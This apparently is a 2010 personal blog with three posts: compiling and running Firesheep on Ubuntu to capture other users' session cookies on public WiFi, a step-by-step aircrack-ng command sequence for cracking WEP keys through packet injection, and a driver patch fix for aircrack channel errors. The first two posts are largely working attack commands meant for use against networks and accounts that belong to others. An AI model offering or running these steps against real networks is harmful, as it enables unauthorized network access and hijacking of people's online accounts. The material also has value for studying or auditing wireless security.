Friday, November 19, 2010

Compiling Firesheep on Linux

If you follow the (security) news a bit, you've undoubtedly heart about Firesheep. This tool makes it very easy to listen in on public WiFi connections and intercept HTTP Cookies from a plethora of social networking sites and mail services.

This has been possible for a long time (some tcpdump filters and some cookie setting scripts and you're golden), but this tool makes it insanely easy. You can check out the tool and its description on the main site.

The site mentions that Linux support is on the way, and recently it has become possible to successfully compile the tool on Linux. This is what I did to get it running on Ubuntu 10.10.

cd ~git clone git://github.com/mickflemm/firesheep.git
cd firesheep/
./autogen.sh --with-xulrunner-sdk=/usr/lib/xulrunner-devel-1.9.2.12

This will configure the makefile, this will probably fail until you have installed all the right dependencies. Below are the ones I was missing, yours might differ! Check the output for hints on which package you need to install.

sudo apt-get install libxul-dev xulrunner-devsudo libpcap-devsudo libhal-dev
# Now configure should succeed:
./autogen.sh --with-xulrunner-sdk=/usr/lib/xulrunner-devel-1.9.2.12

We now need to make a small change to the makefile.

gedit mozpopen/Makefile

Change the MOZ_CFLAGS = ... line to:

MOZ_CFLAGS = -fshort-wchar -I/usr/lib/xulrunner-devel-1.9.2.12/include -I/usr/include/nspr

Now we start compiling.

make

This will probably fail with the message:

make[1]: *** No rule to make target `deps/http-parser/http_parser.c', needed by `../xpi/platform/.../firesheep-backend'.  Stop.

This is fixed by running a submodule update:

git submodule update --init

And make again:

make

You'll now have an extension in the build directory. Drag the .xpi to Firefox to install Firesheep, then close Firefox completely.

Firesheep expects your wireless interface to be in monitor mode. The easiest way to do this is to use airmon-ng:

sudo airmon-ng start eth1 #Substitute your wireless interface name

Now start Firefox with root rights:

sudo firefox

Go to Tools → Add-ons, and open the Firesheep Preferences under the Extensions view. Another window opens. Set the Capture Interface to mon0.

Press CTRL+SHIFT+S to open the Firesheep sidebar and to start capturing.

Good luck. Also, be sure to check out Blacksheep, a tool to detect Firesheep tampering on your network.

Wednesday, November 03, 2010

Aircrack Quick Tutorial (Wireless WEP Cracking)

Speaking of wireless. The following is just a quick note-to-self, because I always forget the exact commands and end up crawling around the Aircrack wiki for a bit. I though I'd posted this before, but I can't seem to find it.

TTY1$ sudo airmon-ng start eth1
# Assume monitor started on mon0.
TTY1$ sudo airodump-ng mon0
# Scout interesting APs and focus:
TTY1$ sudo airodump-ng --channel X --bssid XX:XX:XX:XX:XX:XX -w output mon0
# OK, this terminal is dumping data. Open a new one.

TTY2$ sudo aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX mon0
# ... Association successful :-)

# Now start the attack. I like opening a new terminal for this.
# Don't bother with the ARP request replay attack.
# The best method to use is the -p 0841 one, especially when using
# a crappy wifi chip like me (3945ABG). Last time I checked, the
# advanced attack methods (KoreK chopchop, fragmentation, caffe-
# latte and Hirte) didn't work.
TTY3$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX mon0

# Wait until a packet is captured. It's best to use a small one (Size: 68).
# Reinject and the data-counter in TTY1 (airodump) should go up. Now get cracking:
TTY4$ sudo aircrack-ng -b XX:XX:XX:XX:XX:XX output*.cap

#And, optional:
TTY5$ sudo aircrack-ng -K -b XX:XX:XX:XX:XX:XX output*.cap

Ubuntu 10.10: "fixed channel mon0: -1" Aircrack Problem With iwl3945

Update for Ubuntu 12.04 users: see this post.

*
*  *

After upgrading to Ubuntu Maverick, the Aircrack suite stopped working.

After setting airodump to a channel (like usual):

airodump --channel X
It still displayed its status as:

fixed channel mon0: -1
Some forum users advised to use:

airodump --channel X,X
But this didn't work. For the record, I'm using a Thinkpad X60, with the iwl3945 driver. lshw output:


  *-network
       description: Wireless interface
       product: PRO/Wireless 3945ABG [Golan] Network Connection
       vendor: Intel Corporation
       physical id: 0
       bus info: pci@0000:03:00.0
       logical name: eth1
       version: 02
       width: 32 bits
       clock: 33MHz
       capabilities: bus_master cap_list ethernet physical wireless


Luckily, there is an easy to follow thread on the forums which fixes the problem for a similar card. This solution also worked with my 3945ABG.

Here are the commands:


wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo modprobe iwl3945


Alternatively you can also use sudo reboot instead of sudo modprobe if you're unsure which driver module you need to load.

Aircrack should work fine again now. Note that kernel updates might overwrite the module again (and, hopefully, fix the bug at the same time).